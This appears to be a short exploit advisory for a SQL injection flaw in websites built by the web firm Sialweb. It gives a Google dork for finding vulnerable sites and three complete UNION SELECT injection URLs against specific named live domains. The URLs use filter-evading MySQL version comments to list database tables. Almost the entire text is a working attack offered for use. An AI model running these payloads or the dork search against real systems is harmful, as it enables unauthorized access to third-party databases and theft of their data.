*********************************************************
#Exploit Title: Sialweb – SQL Injection vulnerability
#Date: 2020-08-15
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://sialweb.net
#Google Dork: "Design And Developed By Sialweb"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Design And Developed By Sialweb"
Demo 1:
https://sialweb.net/portfolio-details.php?Mid=1&Pid=-1%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,/*!50000group_concat(table_name,0x3C62723E)*/,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49%20/*!50000from*/%20/*!50000information_schema*/./*!50000tables*/%20where%20table_schema=database()--+
Demo 2:
http://heromarts.com/products.php?category_id=50&bid=50%27%20/*!12345union*/%20select%201,2,/*!50000group_concat(table_name,0x3C62723E)*/,4,5,6,7,8,9,10,11,12,13%20/*!50000from*/%20/*!50000information_schema*/./*!50000tables*/%20where%20table_schema=database()--+
Demo 3:
http://www.aplus.com.pk/about.php?Id=-3%20/*!50000union*/%20/*!50000select*/%20/*!50000group_concat(table_name,0x3C62723E)*/%20%20%20%20/*!50000from*/%20/*!50000information_schema*/./*!50000tables*/%20where%20table_schema=database()--
*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email : mr.mansoori@yahoo.com
*********************************************************